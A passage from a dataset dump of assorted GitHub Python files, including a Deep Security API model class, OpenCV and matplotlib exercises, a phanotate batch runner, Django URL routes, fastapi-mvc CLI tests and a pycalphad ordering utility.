Events()","repo_name":"Clangen-Web/clangen-web.github.io","sub_path":"scripts/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":76705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71600804647","text":"# -*- coding:utf-8 -*-\n\nimport codecs\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef get_max_length(input_file):\n left_length = []\n right_length = []\n with codecs.open(input_file, 'r', encoding='utf-8_sig') as rfile:\n for line in rfile.readlines():\n data = line.split('\\t')\n left_data = data[0].split()\n left_length.append(len(left_data))\n right_data = data[1].split()\n right_length.append(len(right_data))\n return max(max(left_length), max(right_length))\n\n\ndef get_vocab(input_file):\n vocab = set('pad')\n with codecs.open(input_file, 'r', encoding='utf-8_sig') as rfile:\n for line in rfile.readlines():\n data = line.split('\\t')\n for char in data[0].split():\n vocab.add(char)\n for char in data[1].split():\n vocab.add(char)\n vocab = {word:(i+1) for i, word in enumerate(vocab)}\n vocab['pad'] = 0\n return vocab\n\ndef padding_sentence(data, max_length, vocab):\n sentence = [vocab[word] for word in data.split()]\n if len(sentence) < max_length:\n sentence = sentence + [vocab['pad']]*(max_length-len(sentence))\n elif len(sentence) > max_length:\n sentence = sentence[:max_length]\n return sentence\n\ndef load_data(input_file):\n max_length = get_max_length(input_file)\n vocab = get_vocab(input_file)\n left_data = []\n right_data = []\n label = []\n with codecs.open(input_file, 'r', encoding='utf_8_sig') as rfile:\n for line in rfile.readlines():\n data = line.strip().split('\\t')\n\n left_data.append(padding_sentence(data[0], max_length, vocab))\n right_data.append(padding_sentence(data[1], max_length, vocab))\n if int(data[2]) == 0: label.append([1, 0])\n else: label.append([0, 1])\n x_left_data = np.array(left_data)\n x_right_data = np.array(right_data)\n y_label = np.array(label)\n return x_left_data, x_right_data, y_label, vocab, max_length\n\nif __name__ == '__main__':\n # x_left_data, x_right_data, y_label, vocab, max_length = load_data('data/atec_train_data.txt')\n # print(x_left_data[0])\n # print(y_label[0])\n import tensorflow as tf\n dbpedia = tf.contrib.learn.datasets.load_dataset('dbpedia')\n\n\n\n","repo_name":"zhongbin1/DeepMatching","sub_path":"data_helps.py","file_name":"data_helps.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"34423576195","text":"# coding: utf-8\r\n\r\n\"\"\"\r\n Trend Micro Deep Security API\r\n\r\n Copyright 2018 - 2020 Trend Micro Incorporated.
    Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501\r\n\r\n OpenAPI spec version: 20.0.186\r\n \r\n Generated by: https://github.com/swagger-api/swagger-codegen.git\r\n\"\"\"\r\n\r\n\r\nimport pprint\r\nimport re # noqa: F401\r\n\r\nimport six\r\n\r\nfrom deepsecurity.models.account_rights import AccountRights # noqa: F401,E501\r\nfrom deepsecurity.models.fix_rights import FixRights # noqa: F401,E501\r\nfrom deepsecurity.models.heap_rights import HeapRights # noqa: F401,E501\r\nfrom deepsecurity.models.license_rate_rights import LicenseRateRights # noqa: F401,E501\r\nfrom deepsecurity.models.network_security_rights import NetworkSecurityRights # noqa: F401,E501\r\nfrom deepsecurity.models.query_rights import QueryRights # noqa: F401,E501\r\nfrom deepsecurity.models.query_traceback_rights import QueryTracebackRights # noqa: F401,E501\r\nfrom deepsecurity.models.server_log_rights import ServerLogRights # noqa: F401,E501\r\nfrom deepsecurity.models.stack_trace_rights import StackTraceRights # noqa: F401,E501\r\n\r\n\r\nclass HostedServiceRights(object):\r\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\r\n\r\n Do not edit the class manually.\r\n \"\"\"\r\n\r\n \"\"\"\r\n Attributes:\r\n swagger_types (dict): The key is attribute name\r\n and the value is attribute type.\r\n attribute_map (dict): The key is attribute name\r\n and the value is json key in definition.\r\n \"\"\"\r\n swagger_types = {\r\n 'account_rights': 'AccountRights',\r\n 'fix_rights': 'FixRights',\r\n 'heap_rights': 'HeapRights',\r\n 'license_rate_rights': 'LicenseRateRights',\r\n 'query_rights': 'QueryRights',\r\n 'query_traceback_rights': 'QueryTracebackRights',\r\n 'server_log_rights': 'ServerLogRights',\r\n 'stack_trace_rights': 'StackTraceRights',\r\n 'network_security_rights': 'NetworkSecurityRights'\r\n }\r\n\r\n attribute_map = {\r\n 'account_rights': 'accountRights',\r\n 'fix_rights': 'fixRights',\r\n 'heap_rights': 'heapRights',\r\n 'license_rate_rights': 'licenseRateRights',\r\n 'query_rights': 'queryRights',\r\n 'query_traceback_rights': 'queryTracebackRights',\r\n 'server_log_rights': 'serverLogRights',\r\n 'stack_trace_rights': 'stackTraceRights',\r\n 'network_security_rights': 'networkSecurityRights'\r\n }\r\n\r\n def __init__(self, account_rights=None, fix_rights=None, heap_rights=None, license_rate_rights=None, query_rights=None, query_traceback_rights=None, server_log_rights=None, stack_trace_rights=None, network_security_rights=None): # noqa: E501\r\n \"\"\"HostedServiceRights - a model defined in Swagger\"\"\" # noqa: E501\r\n\r\n self._account_rights = None\r\n self._fix_rights = None\r\n self._heap_rights = None\r\n self._license_rate_rights = None\r\n self._query_rights = None\r\n self._query_traceback_rights = None\r\n self._server_log_rights = None\r\n self._stack_trace_rights = None\r\n self._network_security_rights = None\r\n self.discriminator = None\r\n\r\n if account_rights is not None:\r\n self.account_rights = account_rights\r\n if fix_rights is not None:\r\n self.fix_rights = fix_rights\r\n if heap_rights is not None:\r\n self.heap_rights = heap_rights\r\n if license_rate_rights is not None:\r\n self.license_rate_rights = license_rate_rights\r\n if query_rights is not None:\r\n self.query_rights = query_rights\r\n if query_traceback_rights is not None:\r\n self.query_traceback_rights = query_traceback_rights\r\n if server_log_rights is not None:\r\n self.server_log_rights = server_log_rights\r\n if stack_trace_rights is not None:\r\n self.stack_trace_rights = stack_trace_rights\r\n if network_security_rights is not None:\r\n self.network_security_rights = network_security_rights\r\n\r\n @property\r\n def account_rights(self):\r\n \"\"\"Gets the account_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to accounts. # noqa: E501\r\n\r\n :return: The account_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: AccountRights\r\n \"\"\"\r\n return self._account_rights\r\n\r\n @account_rights.setter\r\n def account_rights(self, account_rights):\r\n \"\"\"Sets the account_rights of this HostedServiceRights.\r\n\r\n Rights related to accounts. # noqa: E501\r\n\r\n :param account_rights: The account_rights of this HostedServiceRights. # noqa: E501\r\n :type: AccountRights\r\n \"\"\"\r\n\r\n self._account_rights = account_rights\r\n\r\n @property\r\n def fix_rights(self):\r\n \"\"\"Gets the fix_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to fixes. # noqa: E501\r\n\r\n :return: The fix_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: FixRights\r\n \"\"\"\r\n return self._fix_rights\r\n\r\n @fix_rights.setter\r\n def fix_rights(self, fix_rights):\r\n \"\"\"Sets the fix_rights of this HostedServiceRights.\r\n\r\n Rights related to fixes. # noqa: E501\r\n\r\n :param fix_rights: The fix_rights of this HostedServiceRights. # noqa: E501\r\n :type: FixRights\r\n \"\"\"\r\n\r\n self._fix_rights = fix_rights\r\n\r\n @property\r\n def heap_rights(self):\r\n \"\"\"Gets the heap_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to the heap. # noqa: E501\r\n\r\n :return: The heap_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: HeapRights\r\n \"\"\"\r\n return self._heap_rights\r\n\r\n @heap_rights.setter\r\n def heap_rights(self, heap_rights):\r\n \"\"\"Sets the heap_rights of this HostedServiceRights.\r\n\r\n Rights related to the heap. # noqa: E501\r\n\r\n :param heap_rights: The heap_rights of this HostedServiceRights. # noqa: E501\r\n :type: HeapRights\r\n \"\"\"\r\n\r\n self._heap_rights = heap_rights\r\n\r\n @property\r\n def license_rate_rights(self):\r\n \"\"\"Gets the license_rate_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to license rates. # noqa: E501\r\n\r\n :return: The license_rate_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: LicenseRateRights\r\n \"\"\"\r\n return self._license_rate_rights\r\n\r\n @license_rate_rights.setter\r\n def license_rate_rights(self, license_rate_rights):\r\n \"\"\"Sets the license_rate_rights of this HostedServiceRights.\r\n\r\n Rights related to license rates. # noqa: E501\r\n\r\n :param license_rate_rights: The license_rate_rights of this HostedServiceRights. # noqa: E501\r\n :type: LicenseRateRights\r\n \"\"\"\r\n\r\n self._license_rate_rights = license_rate_rights\r\n\r\n @property\r\n def query_rights(self):\r\n \"\"\"Gets the query_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to queries. # noqa: E501\r\n\r\n :return: The query_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: QueryRights\r\n \"\"\"\r\n return self._query_rights\r\n\r\n @query_rights.setter\r\n def query_rights(self, query_rights):\r\n \"\"\"Sets the query_rights of this HostedServiceRights.\r\n\r\n Rights related to queries. # noqa: E501\r\n\r\n :param query_rights: The query_rights of this HostedServiceRights. # noqa: E501\r\n :type: QueryRights\r\n \"\"\"\r\n\r\n self._query_rights = query_rights\r\n\r\n @property\r\n def query_traceback_rights(self):\r\n \"\"\"Gets the query_traceback_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to query traceback. # noqa: E501\r\n\r\n :return: The query_traceback_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: QueryTracebackRights\r\n \"\"\"\r\n return self._query_traceback_rights\r\n\r\n @query_traceback_rights.setter\r\n def query_traceback_rights(self, query_traceback_rights):\r\n \"\"\"Sets the query_traceback_rights of this HostedServiceRights.\r\n\r\n Rights related to query traceback. # noqa: E501\r\n\r\n :param query_traceback_rights: The query_traceback_rights of this HostedServiceRights. # noqa: E501\r\n :type: QueryTracebackRights\r\n \"\"\"\r\n\r\n self._query_traceback_rights = query_traceback_rights\r\n\r\n @property\r\n def server_log_rights(self):\r\n \"\"\"Gets the server_log_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to server logs. # noqa: E501\r\n\r\n :return: The server_log_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: ServerLogRights\r\n \"\"\"\r\n return self._server_log_rights\r\n\r\n @server_log_rights.setter\r\n def server_log_rights(self, server_log_rights):\r\n \"\"\"Sets the server_log_rights of this HostedServiceRights.\r\n\r\n Rights related to server logs. # noqa: E501\r\n\r\n :param server_log_rights: The server_log_rights of this HostedServiceRights. # noqa: E501\r\n :type: ServerLogRights\r\n \"\"\"\r\n\r\n self._server_log_rights = server_log_rights\r\n\r\n @property\r\n def stack_trace_rights(self):\r\n \"\"\"Gets the stack_trace_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to stack traces. # noqa: E501\r\n\r\n :return: The stack_trace_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: StackTraceRights\r\n \"\"\"\r\n return self._stack_trace_rights\r\n\r\n @stack_trace_rights.setter\r\n def stack_trace_rights(self, stack_trace_rights):\r\n \"\"\"Sets the stack_trace_rights of this HostedServiceRights.\r\n\r\n Rights related to stack traces. # noqa: E501\r\n\r\n :param stack_trace_rights: The stack_trace_rights of this HostedServiceRights. # noqa: E501\r\n :type: StackTraceRights\r\n \"\"\"\r\n\r\n self._stack_trace_rights = stack_trace_rights\r\n\r\n @property\r\n def network_security_rights(self):\r\n \"\"\"Gets the network_security_rights of this HostedServiceRights. # noqa: E501\r\n\r\n Rights related to Network Security. # noqa: E501\r\n\r\n :return: The network_security_rights of this HostedServiceRights. # noqa: E501\r\n :rtype: NetworkSecurityRights\r\n \"\"\"\r\n return self._network_security_rights\r\n\r\n @network_security_rights.setter\r\n def network_security_rights(self, network_security_rights):\r\n \"\"\"Sets the network_security_rights of this HostedServiceRights.\r\n\r\n Rights related to Network Security. # noqa: E501\r\n\r\n :param network_security_rights: The network_security_rights of this HostedServiceRights. # noqa: E501\r\n :type: NetworkSecurityRights\r\n \"\"\"\r\n\r\n self._network_security_rights = network_security_rights\r\n\r\n def to_dict(self):\r\n \"\"\"Returns the model properties as a dict\"\"\"\r\n result = {}\r\n\r\n for attr, _ in six.iteritems(self.swagger_types):\r\n value = getattr(self, attr)\r\n if isinstance(value, list):\r\n result[attr] = list(map(\r\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\r\n value\r\n ))\r\n elif hasattr(value, \"to_dict\"):\r\n result[attr] = value.to_dict()\r\n elif isinstance(value, dict):\r\n result[attr] = dict(map(\r\n lambda item: (item[0], item[1].to_dict())\r\n if hasattr(item[1], \"to_dict\") else item,\r\n value.items()\r\n ))\r\n else:\r\n result[attr] = value\r\n if issubclass(HostedServiceRights, dict):\r\n for key, value in self.items():\r\n result[key] = value\r\n\r\n return result\r\n\r\n def to_str(self):\r\n \"\"\"Returns the string representation of the model\"\"\"\r\n return pprint.pformat(self.to_dict())\r\n\r\n def __repr__(self):\r\n \"\"\"For `print` and `pprint`\"\"\"\r\n return self.to_str()\r\n\r\n def __eq__(self, other):\r\n \"\"\"Returns true if both objects are equal\"\"\"\r\n if not isinstance(other, HostedServiceRights):\r\n return False\r\n\r\n return self.__dict__ == other.__dict__\r\n\r\n def __ne__(self, other):\r\n \"\"\"Returns true if both objects are not equal\"\"\"\r\n return not self == other\r\n\r\n","repo_name":"DeepSecurityHealthCheck/HealthCheckCore","sub_path":"vendor/SDK/deepsecurity/models/hosted_service_rights.py","file_name":"hosted_service_rights.py","file_ext":"py","file_size_in_byte":12685,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"17653042890","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\n\nfrom collections import namedtuple\n\n\nPolymorphicClassInfo = namedtuple('PolymorphicClassInfo', [\n 'model',\n 'fields',\n])\n\n\ndef get_subclasses(cls):\n \"\"\"\n Recursively creates a list of all subclasses of the provided class.\n \"\"\"\n return cls.__subclasses__() + [sub\n for direct in cls.__subclasses__()\n for sub in get_subclasses(direct)]\n\n\ndef get_polymorphic_field_mapping(cls):\n \"\"\"\n Creates several helper attributes on the serializer and builds a\n mapping of subclasses to the fields included on each.\n \"\"\"\n return {\n subclass.__name__: PolymorphicClassInfo(\n model=subclass,\n fields=[field for field in subclass._meta.local_fields\n if field.serialize and not field.rel])\n for subclass in get_subclasses(cls) + [cls]\n }\n","repo_name":"emergence-lab/emergence-lab","sub_path":"core/polymorphic.py","file_name":"polymorphic.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10859765347","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# give us 100 2d values centered at 0\n# X = np.random.randn(100, 2)\n#\n# plt.scatter(X[:,0], X[:,1])\n# plt.show()\n\nX = np.random.randn(200, 2)\n# create clusters of data\n# select all the rows from index 0 to index 50 and add a 3 to all elements\nX[:50] += 3\n\n# this is a 1d array that colors the particular clusters\nY = np.zeros(200)\nY[:50] = 1\n\nplt.scatter(X[:,0], X[:,1], c=Y)\nplt.show()","repo_name":"PikePullen/matplotlib2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33333787367","text":"import cv2 as cv\nimport numpy as np\n\nimg1 = cv.imread(\"imagenes/img1.jpg\")\nimg2 = cv.imread(\"imagenes/img2.png\")\ncv.imwrite(\"Resultados/Original_Universe.png\", img1)\ncv.imwrite(\"Resultados/Original_Thanos.png\", img2)\n\n\n#####################################################################\ndef rescale(image, scale=0.5):\n width = int(image.shape[1]*scale)\n height = int(image.shape[0]*scale)\n dimensions = (width, height)\n\n return cv.resize(image, dimensions, interpolation=cv.INTER_AREA)\n\nimg1_rescale = rescale(img1)\nimg2_rescale = rescale(img2)\ncv.imwrite(\"Resultados/Rescaled_Universe.png\",img1_rescale)\ncv.imwrite(\"Resultados/Rescaled_Thanos.png\",img2_rescale)\n\n####################################################################\n\ndef draws1 (image1):\n \n cv.rectangle(image1, (500, 100), (50, 20), (43, 54, 165), thickness=2)\n cv.circle(image1, (530, 60), 50, (255, 64, 255), thickness=-1)\n cv.circle(image1, (500, 200), 80, (112, 10, 30), thickness=2)\n cv.circle(image1, (100, 200), 100, (64, 87, 130), thickness=-1)\n cv.line(image1,(200,0),(600,200),(0,255,0),thickness=10)\n cv.putText(image1, \"This is magnificent\", (100, 200), cv.FONT_HERSHEY_TRIPLEX, 1, (255, 255, 255), 2)\n \n return(image1)\n\ndef draws2(image2):\n cv.rectangle(image2, (500, 540), (200, 400), (43, 54, 165), thickness=cv.FILLED)\n cv.circle(image2, (530, 60), 50, (120, 280, 30), thickness=-1)\n cv.circle(image2, (310, 110), 100, (12, 210, 30), thickness=2)\n cv.circle(image2, (100, 200), 100, (120, 80, 130), thickness=-1)\n cv.line(image2,(600,0),(0,600),(255,255,0),thickness=10)\n cv.putText(image2, \"I AM INEVIBALE\", (230, 480), cv.FONT_HERSHEY_DUPLEX, 1, (255, 255, 255), 2)\n\n \n return(image2)\n\ndraw11 = draws1(img1)\ndraw12 = draws2(img2)\ncv.imwrite(\"Resultados/Draw_Universe.png\", draw11 )\ncv.imwrite(\"Resultados/Draw_Thanos.png\", draw12)\n\n\n####################################################################\ndef ColorScale(image):\n con = cv.cvtColor(image, cv.COLOR_BGR2RGB)\n return(con) \n\ndef grayScale(image):\n con = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n return(con)\n\ncon_uni = ColorScale(img1)\ncon_tha = ColorScale(img2)\ngray_uni = grayScale(img1)\ngray_tha = grayScale(img2)\n\ncv.imwrite(\"Resultados/Inverted_Universe.png\", con_uni)\ncv.imwrite(\"Resultados/Iverted_Thanos.png\", con_tha)\ncv.imwrite(\"Resultados/Gray_Universe.png\", gray_uni)\ncv.imwrite(\"Resultados/Gray_Thanos.png\", gray_tha)\n######################################################################\n\n#recro = cv.rectangle(img1, (575, 320), (477, 220), (0,0,255), thickness=2)\ndef croped1():\n UniCro = img1[220:320, 477:575]\n return(UniCro)\n\n#recro = cv.rectangle(img2, (230, 10), (400, 225), (0, 0, 255), thickness=2)\ndef croped2():\n ThaCro = img2[10:225, 230:400]\n return(ThaCro)\n\nCropUni =croped1() \nCropTha =croped2()\n\ncv.imwrite(\"Resultados/Croped_Star.png\", CropUni)\ncv.imwrite(\"Resultados/Croped_Thanos.png\", CropTha)\n######################################################################\ndef th(img):\n ret, thresh = cv.threshold(img, 110, 255, cv.THRESH_BINARY)\n return(thresh)\n\nthresh_uni= th(gray_uni)\nthresh_tha = th(gray_tha)\n\ncv.imwrite(\"Resultados/Thresh_Thanos.png\", thresh_tha)\ncv.imwrite(\"Resultados/Thresh_Universe.png\", thresh_uni)\n\n#######################################################################\ndef mask(image):\n blank = np.zeros(image.shape[:2], dtype = \"uint8\")\n circle = cv.circle(blank, (image.shape[1]//2,image.shape[0]//2),100,255, -1)\n masked = cv.bitwise_and(image,image,mask=circle)\n return(masked)\n\nmasked_uni = mask(img1)\nmasked_Thanos = mask(img2)\ncv.imwrite(\"Resultados/Masked_Uni.png\", masked_uni)\ncv.imwrite(\"Resultados/Masked_Thanos.png\", masked_Thanos)\n\n########################################################################\n\n\n","repo_name":"NestorMartinez13/Taller_3_Python_UPB_2022_1003043733","sub_path":"transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6263588374","text":"#!/usr/bin/env python3\n\"\"\"\nPhanotate runner.\nUsage:\n phanotate_runner.py ( --input_file_list=PATH ) ( --output_dir=PATH )\n ( --out_format=FORMAT ) ( --threads=INT )\n\nOptions:\n -h --help Show this screen.\n -i --input_file_list=PATH Path to a file containing a list of input fasta files.\n -o --output_dir=PATH Path to the output directory.\n -f --out_format=FORMAT Format of the output files choices=['tabular','genbank','fasta'] [default: genbank]\n -t --threads=INT Number of threads to use for running individual anotations [default: 1].\n\"\"\"\nimport os\nimport sys\nimport subprocess\nimport logging\nfrom multiprocessing import Pool\nfrom functools import partial\nfrom docopt import docopt\nlogger = logging.getLogger(__name__)\n\n\ndef check_extensions(input_file):\n extensions = ('.fasta', 'fasta.gz', '.fa', '.fa.gz', '.fna', '.fna.gz')\n for ext in extensions:\n if input_file.endswith(ext):\n return ext\n raise ValueError(\"Input file does not have a valid extension: {}\\nValid extensions are: {}\".format(input_file, extensions))\n\ndef run_phanotate(input_file, output_dir, out_format, input_file_extension='', output_file_extension='',):\n \"\"\"\n Run phanotate on a single input file.\n \"\"\"\n out_fname = os.path.join(output_dir, os.path.basename(input_file).replace(input_file_extension, output_file_extension))\n try:\n cmd = [\n 'phanotate.py',\n '-o', out_fname,\n '-f', out_format,\n input_file ]\n logger.info(\"Running phanotate on {}\".format(input_file))\n logger.info(\"Running command: {}\".format(' '.join(cmd)))\n subprocess.run(cmd, check=True)\n except subprocess.CalledProcessError:\n logger.error(\"Error running phanotate on {}\".format(input_file))\n sys.exit(1)\n\ndef main(*args, **kwargs):\n logging.basicConfig(\n level = logging.INFO,\n datefmt=\"%Y-%m-%d %H:%M\",\n format=\"[%(name)s][%(asctime)s][%(levelname)s] %(message)s\",\n handlers=[\n logging.StreamHandler(),\n ]\n )\n logger.info(\"Arguments: {}\".format(kwargs))\n\n assert int(kwargs['--threads']) > 0, \"Number of threads must be greater than 0\"\n\n kwargs['--output_dir'] = os.path.abspath(kwargs['--output_dir'])\n assert os.path.isdir(kwargs['--output_dir']), \"Output directory does not exist: {}\".format(kwargs['--output_dir'])\n\n file_extensions = {'tabular': '.tsv', 'genbank': '.gbk', 'fasta': '.fna'}\n assert kwargs['--out_format'] in file_extensions.keys(), \"Output format must be one of: {}\".format(file_extensions.keys())\n\n with open(kwargs['--input_file_list'], 'r') as f:\n input_files = f.read().splitlines()\n\n for input_file in input_files:\n assert os.path.exists(input_file), \"Input file does not exist: {}\".format(input_file)\n\n logger.info(\"Running phanotate on {} files\".format(len(input_files)))\n\n logger.info(\"Starting phanotate annotations with {} threads\".format(kwargs['--threads']))\n with Pool(int(kwargs['--threads'])) as p:\n p.map(\n partial(\n run_phanotate,\n output_dir=kwargs['--output_dir'],\n out_format=kwargs['--out_format'],\n input_file_extension=check_extensions(input_files[0]),\n output_file_extension=file_extensions[kwargs['--out_format']],\n ),\n input_files)\n\n logger.info(\"FINISHED !\")\n\nif __name__ == '__main__':\n main(**docopt(__doc__))\n","repo_name":"pangenome/phage-evo-paper","sub_path":"workflow/scripts/phanotate_runner.py","file_name":"phanotate_runner.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26288370638","text":"from collections import Counter\n\nf = open(\"msgs.txt\",\"r\")\nmsgs=[]\nfor msg in f.readlines():\n\tmsgs.append(msg[-5:-1])\n\ncntrs = Counter(msgs)\nfreqs = Counter(cntrs.values())\n\nfor cntr in cntrs:\n\tprint(cntr, cntrs[cntr])\nprint(freqs, \"sum:\", sum(cntrs.values()))\n","repo_name":"amjadmajid/Backscatter-Network","sub_path":"sniffer/frame_stats.py","file_name":"frame_stats.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40390332495","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"ShopHome\"),\n path(\"contact_us/\", views.contact_us, name=\"Contact us\"),\n path(\"about_us/\", views.about_us, name=\"about_us\"),\n path(\"tracker/\", views.tracker, name=\"tracker\"),\n path(\"prod_view/\", views.prod_view, name=\"prod_view\"),\n path(\"search/\", views.search, name=\"search\"),\n path(\"checkout/\", views.checkout, name=\"checkout\"),\n path(\"handlerequest/\", views.handlerequest, name=\"HandleRequest\"),\n]\n","repo_name":"Fahad-CSE16/EcommerseWeb","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37183128943","text":"import copy\nfrom unittest import mock\n\nimport pytest\nfrom copier.errors import UserMessageError\nfrom fastapi_mvc.cli.update import update\nfrom fastapi_mvc.constants import ANSWERS_FILE, COPIER_PROJECT\n\n\nclass TestCliUpdateCommand:\n\n @pytest.fixture\n def patched_update(self):\n cmd = copy.deepcopy(update)\n copier_patch = mock.patch(\n \"fastapi_mvc.cli.update.copier\",\n )\n cmd.copier = copier_patch.start()\n yield cmd\n copier_patch.stop()\n del cmd\n\n def test_should_exit_zero_when_invoked_with_help(self, monkeypatch, fake_project, cli_runner):\n # given / when\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(update, [\"--help\"])\n\n # then\n assert result.exit_code == 0\n\n def test_should_exit_error_when_invoked_with_invalid_option(self, cli_runner):\n # given / when\n result = cli_runner.invoke(update, [\"--not_exists\"])\n\n # then\n assert result.exit_code == 2\n\n def test_should_exit_zero_and_call_copier_with_defaults(self, patched_update, monkeypatch, fake_project, cli_runner):\n # given / when\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(patched_update, [])\n\n # then\n assert result.exit_code == 0\n patched_update.copier.run_update.assert_called_once_with(\n vcs_ref=COPIER_PROJECT.vcs_ref,\n answers_file=ANSWERS_FILE,\n user_defaults={\n \"_commit\": \"efb938e\",\n \"_src_path\": \"https://github.com/fastapi-mvc/copier-project.git\",\n \"aiohttp\": True,\n \"author\": \"Radosław Szamszur\",\n \"chart_name\": \"fake-project\",\n \"container_image_name\": \"fake-project\",\n \"copyright_date\": \"2022\",\n \"email\": \"github@rsd.sh\",\n \"fastapi_mvc_version\": \"0.17.0\",\n \"github_actions\": True,\n \"helm\": True,\n \"license\": \"MIT\",\n \"nix\": True,\n \"package_name\": \"fake_project\",\n \"project_description\": \"This project was generated with fastapi-mvc.\",\n \"project_name\": \"fake-project\",\n \"redis\": True,\n \"repo_url\": \"https://your.repo.url.here\",\n \"script_name\": \"fake-project\",\n \"version\": \"0.1.0\",\n },\n pretend=False\n )\n\n def test_should_exit_zero_and_call_copier_with_parsed_arguments(self, patched_update, monkeypatch, fake_project, cli_runner):\n # given / when\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(\n patched_update, [\n \"--no-interaction\",\n \"--pretend\",\n \"--use-version\",\n \"master\",\n ],\n )\n\n # then\n assert result.exit_code == 0\n patched_update.copier.run_update.assert_called_once_with(\n vcs_ref=\"master\",\n answers_file=ANSWERS_FILE,\n data={\n \"_commit\": \"efb938e\",\n \"_src_path\": \"https://github.com/fastapi-mvc/copier-project.git\",\n \"aiohttp\": True,\n \"author\": \"Radosław Szamszur\",\n \"chart_name\": \"fake-project\",\n \"container_image_name\": \"fake-project\",\n \"copyright_date\": \"2022\",\n \"email\": \"github@rsd.sh\",\n \"fastapi_mvc_version\": \"0.17.0\",\n \"github_actions\": True,\n \"helm\": True,\n \"license\": \"MIT\",\n \"nix\": True,\n \"package_name\": \"fake_project\",\n \"project_description\": \"This project was generated with fastapi-mvc.\",\n \"project_name\": \"fake-project\",\n \"redis\": True,\n \"repo_url\": \"https://your.repo.url.here\",\n \"script_name\": \"fake-project\",\n \"version\": \"0.1.0\",\n },\n overwrite=True,\n pretend=True,\n )\n\n def test_should_exit_error_when_not_in_fastapi_mvc_project(self, cli_runner, caplog):\n # given / when\n result = cli_runner.invoke(update, [])\n\n # then\n assert result.exit_code == 1\n msg = \"Not a fastapi-mvc project. Try 'fastapi-mvc new --help' for details how to create one.\"\n assert msg in caplog.text\n\n def test_should_exit_error_on_copier_error(self, patched_update, monkeypatch, fake_project, cli_runner):\n # given / when\n patched_update.copier.run_update.side_effect = UserMessageError(\"Fake error\")\n monkeypatch.chdir(fake_project[\"root\"])\n result = cli_runner.invoke(patched_update, [])\n\n # then\n assert result.exit_code == 2\n assert \"Fake error\" in result.output\n patched_update.copier.run_update.assert_called_once()\n","repo_name":"fastapi-mvc/fastapi-mvc","sub_path":"tests/unit/cli/test_update.py","file_name":"test_update.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":495,"dataset":"github-code","pt":"53"} +{"seq_id":"12352042811","text":"\"\"\"\nUtilities for distinguishing and renaming ordered and disordered configurations of\nmulti-sublattice phases.\n\n`OrderingRecord` objects are able to be used for any phase. `OrderingRecords` can be\ncreated automatically for phases modeled with a partitioned order/disorder model through\nthe `create_ordering_records` method, since the partitioned model contains all the\ninformation about the ordered and disordered phase.\n\"\"\"\n\nfrom dataclasses import dataclass\nfrom typing import Sequence, List\nimport itertools\nfrom collections import defaultdict\nimport numpy as np\nimport xarray as xr\nfrom pycalphad.core.utils import unpack_components\n\n@dataclass\nclass OrderingRecord:\n ordered_phase_name: str\n disordered_phase_name: str\n subl_dof: Sequence[int] # number of degrees of freedom in each sublattice of the ordered phase\n symmetric_subl_idx: Sequence[Sequence[int]] # List of sublattices (of the ordered phase) that are symmetric\n\n def is_disordered(self, site_fractions):\n # Short circuit if any site fraction is NaN (i.e. no phase or a different phase)\n if np.any(np.isnan(site_fractions[:sum(self.subl_dof)])):\n return False\n\n # For each sublattice, create a `slice` object for slicing the site\n # fractions of that particular sublattice from the site fraction array\n subl_slices = []\n for subl_idx in range(len(self.subl_dof)):\n start_idx = np.sum(self.subl_dof[:subl_idx], dtype=np.int_)\n end_idx = start_idx + self.subl_dof[subl_idx]\n 